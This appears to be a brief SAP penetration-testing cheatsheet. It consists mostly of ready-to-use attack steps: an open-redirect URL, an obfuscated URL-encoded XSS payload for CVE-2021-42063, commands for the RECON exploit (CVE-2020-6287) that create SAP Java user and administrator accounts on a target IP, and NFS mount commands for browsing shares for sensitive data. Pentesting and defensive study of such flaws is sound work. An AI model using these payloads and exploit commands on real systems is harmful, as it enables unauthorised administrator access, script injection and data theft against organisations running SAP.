SAP-Pentest-Cheatsheet

Bismillah

For conducting the Pentest you should deploy SAP System on your Network

SAP Web Interface Vulnerability

1. Open Redirection Check

https://HOST/sap/public/bc/icf/logoff?redirecturl=MALICIOUSURL

2. Unsecured Protocol (HTTP) Check

http://HOST:PORT/startPage

http://HOST:PORT/sap/public/info

3. System Informational Misconfiguration Check

http://HOST:PORT/sap/public/info

4. XSS (CVE-2021-42063)

look for /SAPIrExtHelp https://localhost/SAPIrExtHelp

https://HOST/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp

5. SAP Information System 1.0 Shell Upload

6. CVE-2022-22536 (ICMAD SAP)

7. SAP RECON vulnerability (CVE-2020-6287, CVE-2020-6286)

https://github.com/chipik/SAP_RECON

Download zip file

python RECON.py -H 172.16.30.8 -f /1111.zip

Create SAP JAVA user

python RECON.py -H 172.16.30.8 -u

Create SAP JAVA Administrator user

python RECON.py -H 172.16.30.8 -a

SAP Network Vulnerability

1. SSL Vulnerability Check

sslscan

2. NFS Mount

nfs-ls nfs://HOST/mount

mkdir mnt && mount -t nfs HOST:/mount ./mnt

Good luck searching sensitive informations

Contribution

I am looking for SAP Virtual Machine or container for doing pentest simulation, if you have info please kindly DM me @linkedin)

Sharing is Caring

كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناس"